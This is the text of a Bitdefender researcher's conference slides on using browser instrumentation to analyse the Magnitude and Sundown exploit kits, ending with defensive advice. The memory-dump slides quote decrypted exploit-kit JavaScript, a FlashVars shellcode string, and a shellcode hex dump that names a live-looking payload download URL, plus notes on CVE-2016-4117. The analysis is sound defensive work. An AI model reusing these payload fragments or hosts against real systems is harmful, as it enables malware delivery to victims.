Browser Instrumentation for Exploit Analysis Mihai Neagu, Bitdefender About • Mihai Neagu – Exploit research @ Bitdefender Past: • Cloud-based protocols • Data encryption • Reverse engineering Summary • Exploit Kits • Magnitude/Cerber demo • The problem • Browser instrumentation • Sundown/Banker demo • Word of advice Exploit Kits – exploit delivery service What I’m interested in • What’s the Exploit Kit • What’s the exploit • What’s the malware Exploit Demo – Magnitude/Cerber Behavior analysis – traffic inspection HTML HTML HTML •Compromised website •Gateway •Magnitude EK landing SWF SWF ? EXE •Flash Selector •Flash Dropper •Unknown •Payload, Cerber Behavior analysis – process activity Internet Explorer Internet Explorer ? Internet Explorer • Download+execute Flash Selector • Download+execute Flash Dropper • Unknown • Download+execute Cerber The problem • Flash Dropper has no exploit code • Where is the actual exploit? • How is Cerber downloaded and executed? • We need more in-depth inspection Something’s hidden • Flash Dropper (Stage 1) decrypts Flash Exploit (Stage 2) in memory • Calls loadBytes on the decrypted bytes • Stage 2 performs the actual exploitation // decrypt ... // execute Stage 2 this.loader.loadBytes(_loc2_); • We need the contents of _loc2_, the parameter of loadBytes • We need memory inspection Browser instrumentation Browser instrumentation • Dynamic HTML load document.write() mshtml.dll, CElement::InjectTextOrHTML • Dynamic JS load eval() jscript9.dll, Js::GlobalObject::DefaultEvalHelper • Dynamic object instantiation, parameters object parameter mshtml.dll, CPropertyBag::AddProp • Dynamic Flash load loadBytes() flash.dll, Loader.loadBytes • Bonus – Dry run block payload execution kernel32.dll, CreateProcess, WriteProcessMemory Exploit Demo – Sundown/Banker Memory dumps analysis • Decrypted JS var SFfbfv = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32">'; SFfbfv = SFfbfv + '<param name="movie" value="'+ hkcgdshfkj +'" />'; SFfbfv = SFfbfv + '<param name="play" value="true"/>'; SFfbfv = SFfbfv + '<!--[if !IE]>-->'; SFfbfv = SFfbfv + '<object type="application/x-shockwave-flash" data="'+ hkcgdshfkj +'" allowScriptAccess=always width="11" height="14">'; Memory dumps analysis • Flash Loader object instantiation <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32"> <param name="movie" value=“…/489567945678456874356487356743256.swf" /> <param name="play" value="true"/> <param name=FlashVars value="exec=909090909090909090909090909090909090909090909090909090909090909 0909090EB7133C9648B71308B760C8B761C8B5E088B…" /> ... </object> Memory dumps analysis • Shellcode 0000000000: ... 0000000120: ... 0000000180: 0000000190: 00000001A0: 00000001B0: 90 90 90 90 90 90 90 90 │ 90 90 90 90 90 90 90 90 ???????????????? D0 7A 2E 74 6D 70 00 21 │ 21 21 21 21 21 21 21 21 Dz.tmp !!!!!!!!! 21 74 32 33 !!!!!!!ÿpÇy_A_Uh ttp://fv4.225291 2.com/z.php?id=1 33 21 74 2E 33 21 70 63 00 21 3A 6F 00 21 2F 6D 00 21 21 FF │ 70 C7 FD DE C0 AF DA 68 2F 66 76 │ 34 2E 32 32 35 32 39 31 2F 7A 2E │ 70 68 70 3F 69 64 3D 31 00 │ Memory dumps analysis • Flash Exploit, actual exploitation public dynamic class Data4 extends DeleteRangeTimelineOperation … public static var flash78:Placement; … • Vulnerability identified CVE-2016-4117 (Flash type confusion) Word of advice Use modern mitigations • Windows 10 – control flow guard • Chrome, Edge – powerful sandboxing features Also use these • AdBlock – block malvertising • Backup – restore encrypted files Thanks for watching!
© Copyright 2026 Paperzz